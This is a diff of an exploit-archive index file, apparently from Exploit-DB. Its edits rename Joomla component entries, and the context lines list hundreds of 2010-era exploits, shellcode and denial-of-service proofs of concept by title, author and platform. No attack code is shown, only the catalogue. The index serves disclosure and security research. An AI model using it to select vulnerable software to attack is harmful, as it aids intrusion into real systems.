-15085,platforms/php/webapps/15085.txt,"Joomla! Component com_ezautos - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
+15084,platforms/php/webapps/15084.txt,"Joomla! Component 'com_timetrack' 1.2.4 - Multiple SQL Injection",2010-09-22,"Salvatore Fresta",php,webapps,0
+15085,platforms/php/webapps/15085.txt,"Joomla! Component 'com_ezautos' - SQL Injection",2010-09-22,Gamoscu,php,webapps,0
 15112,platforms/windows/dos/15112.py,"Microsoft Cinepak Codec CVDecompress - Heap Overflow",2010-09-26,Abysssec,windows,dos,0
 15086,platforms/multiple/dos/15086.py,"Adobe Acrobat Reader and Flash - 'newfunction' Remote Code Execution",2010-09-23,Abysssec,multiple,dos,0
 15088,platforms/windows/dos/15088.txt,"Microsoft Excel - HFPicture Record Parsing Memory Corruption",2010-09-23,Abysssec,windows,dos,0
@@ -13169,7 +13169,7 @@ id,file,description,date,author,platform,type,port
 15104,platforms/windows/dos/15104.py,"Mozilla Firefox CSS - font-face Remote Code Execution",2010-09-25,Abysssec,windows,dos,0
 15106,platforms/asp/webapps/15106.txt,"VisualSite CMS 1.3 - Multiple Vulnerabilities",2010-09-25,Abysssec,asp,webapps,0
 15116,platforms/windows/shellcode/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2) - MessageBox Shellcode (ARM)",2010-09-26,"Celil Ünüver",windows,shellcode,0
-15157,platforms/php/webapps/15157.txt,"Joomla! Component je Guestbook 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
+15157,platforms/php/webapps/15157.txt,"Joomla! Component 'com_jeguestbook' 1.0 - Multiple Vulnerabilities",2010-09-30,"Salvatore Fresta",php,webapps,0
 15118,platforms/asp/webapps/15118.txt,"gokhun asp stok 1.0 - Multiple Vulnerabilities",2010-09-26,KnocKout,asp,webapps,0
 15119,platforms/php/webapps/15119.txt,"PEEL Premium 5.71 - SQL Injection",2010-09-26,KnocKout,php,webapps,0
 15110,platforms/php/webapps/15110.txt,"E-Xoopport - Samsara 3.1 (eCal Module) - Blind SQL Injection",2010-09-25,_mRkZ_,php,webapps,0
@@ -13203,8 +13203,8 @@ id,file,description,date,author,platform,type,port
 15156,platforms/windows/local/15156.py,"Quick Player 1.3 - Unicode SEH Exploit",2010-09-29,"Abhishek Lyall",windows,local,0
 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution",2010-09-30,Abysssec,windows,dos,0
 15160,platforms/asp/webapps/15160.txt,"ASPMass Shopping Cart - Arbitrary File Upload / Cross-Site Request Forgery",2010-09-30,Abysssec,asp,webapps,0
-15162,platforms/php/webapps/15162.rb,"Joomla! Component JE Job - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
-15163,platforms/php/webapps/15163.rb,"Joomla! Component JE Directory - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
+15162,platforms/php/webapps/15162.rb,"Joomla! Component 'com_jejob' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
+15163,platforms/php/webapps/15163.rb,"Joomla! Component 'com_jedirectory' - SQL Injection",2010-09-30,"Easy Laster",php,webapps,0
 15164,platforms/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",php,webapps,0
 15165,platforms/php/webapps/15165.txt,"zen cart 1.3.9f - Multiple Vulnerabilities",2010-10-01,LiquidWorm,php,webapps,0
 15166,platforms/php/webapps/15166.txt,"Zen Cart 1.3.9f (typefilter) - Local File Inclusion",2010-10-01,LiquidWorm,php,webapps,0
@@ -13246,9 +13246,9 @@ id,file,description,date,author,platform,type,port
 15218,platforms/asp/webapps/15218.txt,"xWeblog 2.2 - (oku.asp?makale_id) SQL Injection",2010-10-07,KnocKout,asp,webapps,0
 15219,platforms/asp/webapps/15219.py,"xWeblog 2.2 - (arsiv.asp tarih) SQL Injection",2010-10-08,ZoRLu,asp,webapps,0
 15220,platforms/php/webapps/15220.txt,"Flex Timesheet - Authentication Bypass",2010-10-08,KnocKout,php,webapps,0
-15222,platforms/php/webapps/15222.txt,"Joomla! Component Community Builder Enhenced (CBE) - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
+15222,platforms/php/webapps/15222.txt,"Joomla! Component 'com_cbe' - Local File Inclusion / Remote Code Execution",2010-10-09,"Delf Tonder",php,webapps,0
 15223,platforms/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,php,webapps,0
-15224,platforms/php/webapps/15224.txt,"Joomla! Component js Calendar 1.5.1 Joomla! - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
+15224,platforms/php/webapps/15224.txt,"Joomla! Component 'com_jscalendar' 1.5.1 - Multiple Vulnerabilities",2010-10-09,"Salvatore Fresta",php,webapps,0
 15225,platforms/php/webapps/15225.txt,"VideoDB 3.0.3 - Multiple Vulnerabilities",2010-10-09,Valentin,php,webapps,0
 15268,platforms/php/webapps/15268.txt,"WikiWebHelp 0.3.3 - Insecure Cookie Handling",2010-10-17,FuRty,php,webapps,0
 39571,platforms/php/webapps/39571.txt,"ZenPhoto 1.4.11 - Remote File Inclusion",2016-03-17,"Curesec Research Team",php,webapps,80
@@ -13304,7 +13304,7 @@ id,file,description,date,author,platform,type,port
 15267,platforms/windows/dos/15267.py,"Novel eDirectory DHost Console 8.8 SP3 - Local Overwrite (SEH)",2010-10-17,d0lc3,windows,dos,0
 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0
-15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar (com_jeajaxeventcalendar) - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
+15610,platforms/php/webapps/15610.txt,"Joomla! Component 'com_jeajaxeventcalendar' - SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0
 15273,platforms/multiple/dos/15273.txt,"Opera 10.63 - SVG Animation Element Denial of Service",2010-10-17,fla,multiple,dos,0
 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
@@ -13373,7 +13373,7 @@ id,file,description,date,author,platform,type,port
 15350,platforms/php/webapps/15350.rb,"PHPKit 1.6.1 R2 - overview.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15351,platforms/php/webapps/15351.rb,"mygamingladder MGL Combo System 7.5 - game.php SQL Injection",2010-10-29,"Easy Laster",php,webapps,0
 15352,platforms/windows/remote/15352.html,"Mozilla Firefox 3.6.8 < 3.6.11 - Interleaving document.write and appendChild Exploit (From the Wild)",2010-10-29,Unknown,windows,remote,0
-15353,platforms/php/webapps/15353.txt,"Joomla! Component com_jfuploader < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
+15353,platforms/php/webapps/15353.txt,"Joomla! Component 'com_jfuploader' < 2.12 - Arbitrary File Upload",2010-10-30,Setr0nix,php,webapps,0
 15354,platforms/php/webapps/15354.txt,"Zoopeer 0.1 / 0.2 - 'FCKeditor' Arbitrary File Upload",2010-10-30,Net.Edit0r,php,webapps,0
 15355,platforms/php/webapps/15355.txt,"Simpli Easy (AFC Simple) NewsLetter 4.2 - Cross-Site Scripting / Information Leakage",2010-10-30,p0deje,php,webapps,0
 15356,platforms/windows/dos/15356.pl,"yPlay 2.4.5 - Denial of Service",2010-10-30,"MOHAMED ABDI",windows,dos,0
@@ -13381,8 +13381,8 @@ id,file,description,date,author,platform,type,port
 15358,platforms/windows/remote/15358.txt,"SmallFTPd 1.0.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15360,platforms/php/webapps/15360.pl,"MetInfo 2.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
 15361,platforms/php/webapps/15361.pl,"MetInfo 3.0 - PHP Code Injection",2010-10-31,Beach,php,webapps,0
-15366,platforms/php/webapps/15366.txt,"Joomla! Component Flip Wall (com_flipwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
-15367,platforms/php/webapps/15367.txt,"Joomla! Component Sponsor Wall (com_sponsorwall) - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
+15366,platforms/php/webapps/15366.txt,"Joomla! Component 'com_flipwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
+15367,platforms/php/webapps/15367.txt,"Joomla! Component 'com_sponsorwall' - SQL Injection",2010-10-31,FL0RiX,php,webapps,0
 15368,platforms/windows/remote/15368.php,"Buffy 1.3 - Directory Traversal",2010-10-31,"Yakir Wizman",windows,remote,0
 15369,platforms/php/webapps/15369.php,"Auto CMS 1.8 - Remote Code Execution",2010-10-31,"Giuseppe D'Inverno",php,webapps,0
 15370,platforms/php/webapps/15370.txt,"XAMPP 1.7.3 - Multiple Vulnerabilities",2010-11-01,TheLeader,php,webapps,0
@@ -13419,7 +13419,7 @@ id,file,description,date,author,platform,type,port
 15409,platforms/php/webapps/15409.txt,"Zen Cart 1.3.9h - Local File Inclusion",2010-11-03,"Salvatore Fresta",php,webapps,0
 15412,platforms/php/webapps/15412.txt,"eoCMS 0.9.04 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15411,platforms/windows/dos/15411.pl,"HtaEdit 3.2.3.0 - '.hta' Buffer Overflow",2010-11-04,anT!-Tr0J4n,windows,dos,0
-15413,platforms/php/webapps/15413.txt,"sweetrice CMS 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
+15413,platforms/php/webapps/15413.txt,"SweetRice 0.6.7 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15414,platforms/php/webapps/15414.txt,"JAF CMS 4.0 rc2 - Multiple Vulnerabilities",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection",2010-11-04,"High-Tech Bridge SA",php,webapps,0
 15416,platforms/php/webapps/15416.txt,"JBI CMS - SQL Injection",2010-11-04,Cru3l.b0y,php,webapps,0
@@ -13433,7 +13433,7 @@ id,file,description,date,author,platform,type,port
 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15428,platforms/multiple/dos/15428.rb,"Avidemux 2.5.4 - Buffer Overflow",2010-11-05,The_UnKn@wn,multiple,dos,0
 15429,platforms/windows/dos/15429.txt,"FileFuzz - Denial of Service",2010-11-05,Sweet,windows,dos,0
-15430,platforms/php/webapps/15430.txt,"Joomla! Component ccInvoices (com_ccinvoices) - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
+15430,platforms/php/webapps/15430.txt,"Joomla! Component 'com_ccinvoices' - SQL Injection",2010-11-05,FL0RiX,php,webapps,0
 15431,platforms/php/dos/15431.txt,"PHP 5.3.3/5.2.14 - ZipArchive::getArchiveComment Null Pointer Dereference",2010-11-05,"Maksymilian Arciemowicz",php,dos,0
 15432,platforms/windows/dos/15432.html,"LeadTools 11.5.0.9 - (ltisi11n.ocx) DriverName() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
 15433,platforms/windows/dos/15433.html,"LeadTools 11.5.0.9 - (ltlst11n.ocx) Insert() Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
@@ -13442,8 +13442,8 @@ id,file,description,date,author,platform,type,port
 15436,platforms/windows/dos/15436.html,"LeadTools 11.5.0.9 - (ltdlg11n.ocx) Bitmap Access Violation Denial of Service",2010-11-05,"Matthew Bergin",windows,dos,0
 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0
-15439,platforms/php/webapps/15439.txt,"Joomla! Component com_connect - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
-15440,platforms/php/webapps/15440.txt,"Joomla! Component DCNews com_dcnews - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
+15439,platforms/php/webapps/15439.txt,"Joomla! Component 'com_connect' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
+15440,platforms/php/webapps/15440.txt,"Joomla! Component 'com_dcnews' - Local File Inclusion",2010-11-06,"Th3 RDX",php,webapps,0
 15441,platforms/php/webapps/15441.txt,"MassMirror Uploader - Remote File Inclusion",2010-11-06,ViciOuS,php,webapps,0
 15444,platforms/windows/dos/15444.txt,"G Data TotalCare 2011 - NtOpenKey Race Condition",2010-11-06,"Nikita Tarakanov",windows,dos,0
 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0
@@ -13453,25 +13453,25 @@ id,file,description,date,author,platform,type,port
 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15451,platforms/php/webapps/15451.pl,"DeluxeBB 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
 15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
-15453,platforms/php/webapps/15453.txt,"Joomla! Component com_ckforms - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0
-15454,platforms/php/webapps/15454.txt,"Joomla! Component com_clan - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
+15453,platforms/php/webapps/15453.txt,"Joomla! Component 'com_ckforms' - Local File Inclusion",2010-11-08,"ALTBTA ",php,webapps,0
+15454,platforms/php/webapps/15454.txt,"Joomla! Component 'com_clan' - SQL Injection",2010-11-08,"AtT4CKxT3rR0r1ST ",php,webapps,0
 15455,platforms/php/webapps/15455.txt,"xt:Commerce Shopsoftware 3 / 4 - 'FCKeditor' Arbitrary File Upload",2010-11-08,Net.Edit0r,php,webapps,0
-15456,platforms/php/webapps/15456.txt,"Joomla! Component com_clanlist - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
+15456,platforms/php/webapps/15456.txt,"Joomla! Component 'com_clanlist' - SQL Injection",2010-11-08,CoBRa_21,php,webapps,0
 15494,platforms/windows/dos/15494.pl,"VbsEdit 4.7.2.0 - '.vbs' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15495,platforms/windows/dos/15495.py,"Power Audio Editor 7.4.3.230 - '.cda' Denial of Service",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15496,platforms/php/webapps/15496.txt,"Metinfo 3.0 - Multiple Vulnerabilities",2010-11-12,anT!-Tr0J4n,php,webapps,0
 15458,platforms/windows/dos/15458.txt,"PCSX2 0.9.7 Beta - Binary Denial of Service",2010-11-08,41.w4r10r,windows,dos,0
 15459,platforms/php/webapps/15459.txt,"Seo Panel 2.1.0 - Critical File Disclosure",2010-11-08,MaXe,php,webapps,0
-15460,platforms/php/webapps/15460.txt,"Joomla! Component ProDesk 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
+15460,platforms/php/webapps/15460.txt,"Joomla! Component 'com_pro_desk' 1.5 - Local File Inclusion",2010-11-08,d3v1l,php,webapps,0
 15461,platforms/windows/local/15461.c,"G Data TotalCare 2011 - Local Kernel Exploit",2010-11-08,"Nikita Tarakanov",windows,local,0
 15463,platforms/linux/dos/15463.txt,"Novell Groupwise Internet Agent - IMAP LIST Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
 15464,platforms/linux/dos/15464.txt,"Novell Groupwise Internet Agent - IMAP LIST LSUB Command Remote Code Execution",2010-11-09,"Francis Provencher",linux,dos,0
-15466,platforms/php/webapps/15466.txt,"Joomla! Component JQuarks4s 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
+15466,platforms/php/webapps/15466.txt,"Joomla! Component 'com_jquarks4s' 1.0.0 - Blind SQL Injection",2010-11-09,"Salvatore Fresta",php,webapps,0
 15465,platforms/php/webapps/15465.rb,"Woltlab Burning Board Userlocator 2.5 - SQL Injection",2010-11-09,"Easy Laster",php,webapps,0
 15467,platforms/multiple/dos/15467.txt,"Oracle MySQL < 5.1.49 - 'WITH ROLLUP' Denial of Service",2010-11-09,"Shane Bester",multiple,dos,0
-15468,platforms/php/webapps/15468.txt,"Joomla! Component btg_oglas - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
-15469,platforms/php/webapps/15469.txt,"Joomla! Component com_markt - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
-15470,platforms/php/webapps/15470.txt,"Joomla! Component com_img - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
+15468,platforms/php/webapps/15468.txt,"Joomla! Component 'btg_oglas' - HTML / Cross-Site Scripting Injection",2010-11-09,CoBRa_21,php,webapps,0
+15469,platforms/php/webapps/15469.txt,"Joomla! Component 'com_markt' - SQL Injection",2010-11-09,CoBRa_21,php,webapps,0
+15470,platforms/php/webapps/15470.txt,"Joomla! Component 'com_img' - Local File Inclusion",2010-11-09,CoBRa_21,php,webapps,0
 15484,platforms/php/webapps/15484.txt,"FCKEditor Core 2.x 2.4.3 - (FileManager upload.php) Arbitrary File Upload",2010-11-10,grabz,php,webapps,0
 15472,platforms/php/webapps/15472.txt,"osCommerce 2.2 - Cross-Site Request Forgery",2010-11-09,daandeveloper33,php,webapps,0
 15473,platforms/multiple/webapps/15473.html,"IBM OmniFind - Cross-Site Request Forgery",2010-11-09,"Fatih Kilic",multiple,webapps,0
@@ -13491,8 +13491,8 @@ id,file,description,date,author,platform,type,port
 15493,platforms/windows/dos/15493.py,"Visual MP3 Splitter & Joiner 6.1 - '.wav' Buffer Overflow",2010-11-12,anT!-Tr0J4n,windows,dos,0
 15497,platforms/asp/webapps/15497.txt,"ASPilot Pilot Cart 7.3 - newsroom.asp SQL Injection",2010-11-12,Daikin,asp,webapps,0
 15500,platforms/php/webapps/15500.txt,"Woltlab Burning Board 2.3.4 - File Disclosure",2010-11-12,sfx,php,webapps,0
-15501,platforms/php/webapps/15501.txt,"Joomla! Component com_jsupport - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
-15502,platforms/php/webapps/15502.txt,"Joomla! Component com_jsupport - SQL Injection",2010-11-12,Valentin,php,webapps,0
+15501,platforms/php/webapps/15501.txt,"Joomla! Component 'com_jsupport' - Cross-Site Scripting",2010-11-12,Valentin,php,webapps,0
+15502,platforms/php/webapps/15502.txt,"Joomla! Component 'com_jsupport' - SQL Injection",2010-11-12,Valentin,php,webapps,0
 15504,platforms/hardware/dos/15504.txt,"Camtron CMNC-200 IP Camera - ActiveX Buffer Overflow",2010-11-13,"Trustwave's SpiderLabs",hardware,dos,0
 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0
 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0
@@ -13506,7 +13506,7 @@ id,file,description,date,author,platform,type,port
 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0
 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0
 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0
-15518,platforms/php/webapps/15518.txt,"Joomla! Component ccBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
+15518,platforms/php/webapps/15518.txt,"Joomla! Component 'com_ccboard' 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0
 15519,platforms/php/webapps/15519.txt,"OneOrZero AIms 2.6.0 Members Edition - Multiple Vulnerabilities",2010-11-13,Valentin,php,webapps,0
 15524,platforms/php/webapps/15524.txt,"Pre Ads Portal - SQL Bypass",2010-11-13,Cru3l.b0y,php,webapps,0
 15531,platforms/php/webapps/15531.txt,"BSI Advance Hotel Booking System 1.0 - SQL Injection",2010-11-14,v3n0m,php,webapps,0
@@ -13523,10 +13523,10 @@ id,file,description,date,author,platform,type,port
 15544,platforms/asp/webapps/15544.txt,"Web Wiz NewsPad Express Edition 1.03 - Database File Disclosure",2010-11-15,keracker,asp,webapps,0
 15545,platforms/php/webapps/15545.txt,"Nuked-klaN Module Boutique - Blind SQL Injection",2010-11-15,[AR51]Kevinos,php,webapps,0
 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
-15549,platforms/php/webapps/15549.txt,"Joomla! Component com_alfurqan15x - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
+15549,platforms/php/webapps/15549.txt,"Joomla! Component 'com_alfurqan15x' - SQL Injection",2010-11-15,kaMtiEz,php,webapps,0
 15553,platforms/asp/webapps/15553.txt,"BPConferenceReporting Web Reporting - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
 15554,platforms/asp/webapps/15554.txt,"BPRealestate Real Estate - Authentication Bypass",2010-11-16,v3n0m,asp,webapps,0
-15555,platforms/php/webapps/15555.txt,"Joomla! Component Maian Media (com_maianmedia) - SQL Injection",2010-11-16,v3n0m,php,webapps,0
+15555,platforms/php/webapps/15555.txt,"Joomla! Component 'com_maianmedia' - SQL Injection",2010-11-16,v3n0m,php,webapps,0
 15557,platforms/php/webapps/15557.txt,"openEngine 2.0 100226 - Local File Inclusion / Cross-Site Scripting",2010-11-16,"SecPod Research",php,webapps,0
 15558,platforms/multiple/dos/15558.html,"Apple Safari 5.02 - Stack Overflow Denial of Service",2010-11-16,clshack,multiple,dos,0
 15559,platforms/php/webapps/15559.txt,"IceBB 1.0-rc10 - Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0
@@ -13539,7 +13539,7 @@ id,file,description,date,author,platform,type,port
 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion",2010-11-18,FL0RiX,php,webapps,0
 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0
 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
-15570,platforms/php/webapps/15570.php,"Joomla! Component Template Mosets Tree 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
+15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0
@@ -13552,7 +13552,7 @@ id,file,description,date,author,platform,type,port
 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player - '.NKI' File Syntactic Analysis Buffer Overflow (PoC)",2010-11-20,LiquidWorm,windows,dos,0
 15583,platforms/windows/dos/15583.pl,"Native Instruments Massive 1.1.4 - KSD File Handling Use-After-Free",2010-11-20,LiquidWorm,windows,dos,0
 15584,platforms/windows/local/15584.txt,"Native Instruments Service Center 2.2.5 - Privilege Escalation",2010-11-20,LiquidWorm,windows,local,0
-15585,platforms/php/webapps/15585.txt,"Joomla! Component com_jimtawl - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
+15585,platforms/php/webapps/15585.txt,"Joomla! Component 'com_jimtawl' - Local File Inclusion",2010-11-20,Mask_magicianz,php,webapps,0
 16087,platforms/php/webapps/16087.txt,"PMB Services 3.4.3 - SQL Injection",2011-02-01,Luchador,php,webapps,0
 15588,platforms/php/webapps/15588.txt,"S_CMS 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0
 15589,platforms/windows/local/15589.wsf,"Microsoft Windows - Task Scheduler Privilege Escalation",2010-11-20,webDEViL,windows,local,0
@@ -13657,12 +13657,12 @@ id,file,description,date,author,platform,type,port
 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 - Local File Inclusion",2010-12-09,Br0ly,php,webapps,0
 15712,platforms/arm/shellcode/15712.rb,"ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)",2010-12-09,"Jonathan Salwan",arm,shellcode,0
 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
-15714,platforms/php/webapps/15714.txt,"Joomla! Component JE Auto 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
+15714,platforms/php/webapps/15714.txt,"Joomla! Component 'com_jeauto' 1.0 - SQL Injection",2010-12-09,"Salvatore Fresta",php,webapps,0
 15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - Cross-Site Request Forgery",2010-12-09,"High-Tech Bridge SA",php,webapps,0
 15720,platforms/php/webapps/15720.txt,"Sulata iSoft - 'stream.php' Local File Disclosure",2010-12-10,Sudden_death,php,webapps,0
 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA - SQL Injection",2010-12-09,Br0ly,php,webapps,0
 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload",2010-12-09,"Salvatore Fresta",php,webapps,0
-15721,platforms/php/webapps/15721.txt,"Joomla! Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
+15721,platforms/php/webapps/15721.txt,"Joomla! Component 'com_billyportfolio' 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 - NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
 15723,platforms/freebsd/remote/15723.c,"FreeBSD Litespeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
 15803,platforms/windows/dos/15803.py,"Microsoft IIS 7.5 (Windows 7) - FTPSVC UNAUTH'D Remote Denial of Service (PoC)",2010-12-21,"Matthew Bergin",windows,dos,0
@@ -13684,7 +13684,7 @@ id,file,description,date,author,platform,type,port
 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0
 15747,platforms/windows/local/15747.py,"Aesop GIF Creator 2.1 - '.aep' Buffer Overflow",2010-12-16,xsploitedsec,windows,local,0
 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script - SQL Injection",2010-12-16,ErrNick,php,webapps,0
-15749,platforms/php/webapps/15749.txt,"Joomla! Component JRadio (com_jradio) - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
+15749,platforms/php/webapps/15749.txt,"Joomla! Component 'com_jradio' - Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0
 15750,platforms/windows/dos/15750.py,"Solar FTP Server 2.0 - Multiple Commands Denial of Service",2010-12-16,modpr0be,windows,dos,0
 15751,platforms/windows/local/15751.pl,"Altarsoft Audio Converter 1.1 - Buffer Overflow (SEH)",2010-12-16,"C4SS!0 G0M3S",windows,local,0
 15752,platforms/php/webapps/15752.txt,"Softbiz PHP Joke Site Software - Multiple SQL Injections",2010-12-17,v3n0m,php,webapps,0
@@ -13710,7 +13710,7 @@ id,file,description,date,author,platform,type,port
 15775,platforms/php/webapps/15775.txt,"Mafia Game Script - SQL Injection",2010-12-18,"DeadLy DeMon",php,webapps,0
 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 - Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0
 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
-15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto (com_jeauto) - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
+15779,platforms/php/webapps/15779.txt,"Joomla! Component 'com_jeauto' - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
 15782,platforms/windows/local/15782.pl,"Word Splash Pro 9.5 - Buffer Overflow",2010-12-20,h1ch4m,windows,local,0
 15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
@@ -13721,7 +13721,7 @@ id,file,description,date,author,platform,type,port
 15788,platforms/windows/dos/15788.py,"Accmeware MP3 Cut 5.0.9 - Denial of Service (PoC)",2010-12-20,0v3r,windows,dos,0
